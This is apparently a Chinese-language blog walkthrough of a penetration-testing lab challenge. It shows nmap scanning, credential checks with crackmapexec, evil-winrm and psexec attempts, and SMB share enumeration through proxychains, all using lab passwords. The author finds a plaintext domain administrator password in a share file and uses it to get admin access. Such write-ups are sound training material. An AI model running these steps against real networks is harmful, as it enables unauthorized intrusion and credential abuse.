Challenge 2 - Relia(9)

 Challenge 2 - Relia(9)

下一個目標是內網的 FILE Server,電腦名稱是 FILES,IP 是 172.16.xxx.21



一樣先掃 TOP 100 Port,└─$ proxychains4 -q nmap -vvv -sT --top-ports=100 -Pn 172.16.172.21

只掃到 135、139、445 



FILE Server 最好利用的就是 SMB 445 Port,且有 445 就可以用先測試 crackmapexec

用現有拿到的四個網域帳號測試看看

proxychains4 -q crackmapexec smb 172.16.172.21 -u maildmz -p 'DPuBT9tGCBrTbR'

proxychains4 -q crackmapexec smb 172.16.172.21 -u jim -p 'Castello1!'

proxychains4 -q crackmapexec smb 172.16.172.21 -u andrea -p 'PasswordPassword_6'

proxychains4 -q crackmapexec smb 172.16.172.21 -u michelle -p 'NotMyPassword0k?'

四個都是有用的



四個帳號測試 evil-winrm 都進不去

proxychains4 -q evil-winrm -i 172.16.172.21 -u maildmz -p 'DPuBT9tGCBrTbR'

proxychains4 -q evil-winrm -i 172.16.172.21 -u jim -p 'Castello1!'

proxychains4 -q evil-winrm -i 172.16.172.21 -u andrea -p 'PasswordPassword_6'

proxychains4 -q evil-winrm -i 172.16.172.21 -u michelle -p 'NotMyPassword0k?'



impacket-psexec 一樣沒有任何作用

proxychains4 -q impacket-psexec maildmz:DPuBT9tGCBrTbR@172.16.172.21

proxychains4 -q impacket-psexec jim:'Castello1!'@172.16.172.21

proxychains4 -q impacket-psexec andrea:'PasswordPassword_6'@172.16.172.21

proxychains4 -q impacket-psexec michelle:'NotMyPassword0k?'@172.16.172.21



四個帳號都先執行 SMB 分享列舉試試看有無不同

proxychains4 -q smbclient -L //172.16.172.21/ -U maildmz@relia.com --password='DPuBT9tGCBrTbR'

proxychains4 -q smbclient -L //172.16.172.21/ -U jim@relia.com --password='Castello1!'

proxychains4 -q smbclient -L //172.16.172.21/ -U andrea@relia.com --password='PasswordPassword_6'

proxychains4 -q smbclient -L //172.16.172.21/ -U michelle@relia.com --password='NotMyPassword0k?'

發現四個帳號可以看到的分享都一樣,有三個非常態的資料夾 apps、monitoring、scripts



先從 scripts 下手,proxychains4 -q smbclient \\\\172.16.172.21\\scripts -U jim@relia.com --password='Castello1!'



發了一段時間查看,沒啥發現



proxychains4 -q smbclient \\\\172.16.172.21\\apps -U jim@relia.com --password='Castello1!'

apps 裡面有許多資料夾,花了許多時間查看一樣沒有發現有價值的資訊



將檔案通通抓回來看



依據大小來查看,從最小的檔案開始看,在第二個檔案發現疑似帳號密碼的資訊

PS C:\Users\Administrator> $spass = ConvertTo-SecureString "vau!XCKjNQBv2$" -AsPlaintext -Force

administrator:vau!XCKjNQBv2$



馬上將拿到的帳號密碼測試看看

└─$ proxychains4 -q crackmapexec smb 172.16.172.21 -u administrator -p 'vau!XCKjNQBv2$'

不測試還好一測試嚇死人,這個是 relia.com 網域的 administrator 有效憑證

該不會這樣就把 AD 網域破台了吧



直接 impackex-psexec 進去試試看,└─$ proxychains4 -q impacket-psexec relia.com/administrator:'vau!XCKjNQBv2$'@172.16.172.21

whoami 確認是管理者,順便拿 flag,這一台僅有 proof.txt


更新攻擊列表



更新帳號密碼表,項次 21 是 Domain Admin 特別標示一下




留言

這個網誌中的熱門文章

Challenge 0 - Secura(2)

Challenge 0 - Secura(1)

Challenge 8 - Poseidon(0)